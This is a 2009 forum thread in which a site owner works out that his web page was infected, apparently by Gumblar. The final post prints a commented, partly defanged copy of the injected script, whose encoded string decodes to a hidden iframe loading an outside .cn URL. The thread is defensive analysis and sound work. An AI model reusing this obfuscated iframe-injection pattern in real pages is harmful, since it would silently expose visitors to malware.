| Thread ID: 100444 | 2009-06-08 02:16:00 | Virus on web-page?? | notechyet (4479) | Press F1 |
| Post ID | Timestamp | Content | User |
| 780535 | 2009-06-08 10:15:00 | Thanks a lot guys for all your replies (and testing), and an apology for the infected link. I just did not know how else to ask for advice on this problem. | notechyet (4479) |
| 780536 | 2009-06-08 12:22:00 | Oops.... good point, I didn't think of the implications there - just figured people would be interested in the dissection, rather than actually trying to click through to the nasties. Sorry! Interesting though, as my Avast stopped me getting to the site in question and mentioned an iframe issue. | Sweep (90) |
| 780537 | 2009-06-09 14:38:00 | Hi Erayd, may I ask how you decoded that JS? I am having a very similar problem with my web page. One person has reported JS/Kryptik.F, and another reported HTML/Framer.BS (he uses AVG). I am told others have reported "viruses" as well, but no further details (thanks!). I have a piece of code similar to the offending code you showed on my page, which is at http:// soccerpointeclaire [dot] com. I am not pasting the actual code, and have obfuscated the page address, for obvious reasons. It appears that this is the only page giving problems... The main difference about this page is that it has a Flash logo at the top. I myself have looked at this page with IE, Firefox and Chrome, with no error. I use Trend OfficeScan (corporate version of PC-Cillin). That page, btw, has not changed in months. I know, of course, that it could have somehow been modified by a hacker, but I compared it to an older backup copy, and they are identical (I renamed the old one and uploaded the backup, just in case). I have one possible theory: that a new AV signature, shared by various AV developers (if they do that), may be producing false positives... Another is that somehow the Flash code downloaded from the Macromedia site may have become infected. I guess that's all I have for now, but I welcome any and all questions, and will help in any way I can. Salutations, -Paul | MontrealPaul (14981) |
| 780538 | 2009-06-09 15:13:00 | Quick update: It occurred to me to try simply removing that wonky code, which I did, using a plaintext editor, after making a backup of the original page. Turns out this made no difference (to me) in how the page displays, which suggests that that code was unnecessary, and probably malicious. I use Dreamweaver, btw, which inserts all sorts of wonky code, so sometimes it's hard to tell what belongs and what does not. For those who want to check it out, I have left the original "infected" page there, under the name of index_Virus.htm (note the capital V). Salutations, -Paul | MontrealPaul (14981) |
| 780539 | 2009-06-09 21:15:00 | Latest: Yep, it was a trojan/XSS/worm! I'm not 100% certain, but I suspect it might be Gumblar. Here are two links that speak of it: www.switched.com/2009/06/02/though-the-conficker-virus-was-bad-meet-gumblar/ and blog.avast.com/2009/06/03/gumblarcn-summary/. Yes, I have changed the credentials for my website. Anyone who looks at that "virus" page of mine (see previous posts) will see, after the first <header> tag, a long JavaScript. What it does, in the end, is open an iframe, with opacity=0 (invisible), to a site in China. I have broken it down, and commented it, for anyone interested. I have also modified the code so that any n00b dumb enough to run it will have to try very hard to make it dangerous... (how'd I do, Jen? :)) It will probably be hard to read, in the constraints of this web page, so you may want to copy/paste it into your favourite code editor, where it will be nicely coloured for clarity.

```html
<script type="text/javascript">
// The following assigns the very long string to VariableOne.
// (Note the repeating string "EOje")
var VariableOne = "EOje91EOje105EOje102EOje114EOje97EOje109EOje101EOje32EOje119EOje105EOje100EOje116EOje104EOje61EOje34EOje52EOje56EOje48EOje34EOje32EOje104EOje101EOje105EOje103EOje104EOje116EOje61EOje34EOje54EOje48EOje34EOje32EOje115EOje114EOje99EOje61EOje34EOje104EOje116EOje116EOje112EOje58EOje47EOje47EOje116EOje114EOje97EOje102EOje102EOje105EOje99EOje45EOje114EOje101EOje115EOje111EOje117EOje114EOje99EOje101EOje115EOje46EOje99EOje110EOje47EOje111EOje114EOje100EOje101EOje114EOje47EOje105EOje110EOje46EOje99EOje103EOje105EOje63EOje50EOje34EOje32EOje115EOje116EOje121EOje108EOje101EOje61EOje34EOje98EOje111EOje114EOje100EOje101EOje114EOje58EOje48EOje112EOje120EOje59EOje32EOje112EOje111EOje115EOje105EOje116EOje105EOje111EOje110EOje58EOje114EOje101EOje108EOje97EOje116EOje105EOje118EOje101EOje59EOje32EOje116EOje111EOje112EOje58EOje48EOje112EOje120EOje59EOje32EOje108EOje101EOje102EOje116EOje58EOje45EOje53EOje48EOje48EOje112EOje120EOje59EOje32EOje111EOje112EOje97EOje99EOje105EOje116EOje121EOje58EOje48EOje59EOje32EOje102EOje105EOje108EOje116EOje101EOje114EOje58EOje112EOje114EOje111EOje103EOje105EOje100EOje58EOje68EOje88EOje73EOje109EOje97EOje103EOje101EOje84EOje114EOje97EOje110EOje115EOje102EOje111EOje114EOje109EOje46EOje77EOje105EOje99EOje114EOje111EOje115EOje111EOje102EOje116EOje46EOje65EOje108EOje112EOje104EOje97EOje40EOje111EOje112EOje97EOje99EOje105EOje116EOje121EOje61EOje48EOje41EOje59EOje32EOje45EOje109EOje111EOje122EOje45EOje111EOje112EOje97EOje99EOje105EOje116EOje121EOje58EOje48EOje34EOje93EOje91EOje47EOje105EOje102EOje114EOje97EOje109EOje101EOje93";
// To improve safety, I have replaced code 60 ("<") with 91 ("["), and 62 (">") with 93 ("]").
// This splits VariableOne into a comma-separated string, substituting "EOje" for a comma.
// The result is stored in VariableTwo.
var VariableTwo = VariableOne.split("EOje");
// I'm inserting a printout here of the code so far:
document.write(VariableTwo)
// See www.ascii.cl/htmlcodes.htm for a list of codes.
// Initialize an empty VariableThree
var VariableThree = "";
// The following For loop reads as follows:
// starting at 1,
for (var VariableFour = 1;
     // for each character in VariableTwo,
     VariableFour < VariableTwo.length;
     // incrementing by one each time
     VariableFour++)
// do this:
// VariableThree is now what VariableThree was, plus the character in VariableTwo, at the position VariableFour is at.
{ VariableThree += String.fromCharCode(VariableTwo[VariableFour]); }
// Not sure why this is necessary...
var VariableFive = "" + VariableThree + "";
// Now, deliver the load; DANGER: This is where it all happens!!
document.write("" + VariableFive + "")
// Again, not sure why it is necessary to border with more empty strings...
// Done.
document.write("-----------------------<BR>");
var var1 = "Done"
document.write("" + var1 + "")
</script>
```

N.B.: In the original code, "VariableOne", "VariableTwo", etc. are also garbagey-looking names like hPLAmyvsdfELzjhpwQYf. What this finally produces is something almost (because I "fixed" it) like the following: Why did I go through all of the above, you may ask? Well, the main reason is that I was learning as I went, so I commented to keep track of where I am so far. Plus, it makes it easier to share afterwards! :nerd: Cheers, -Paul | MontrealPaul (14981) |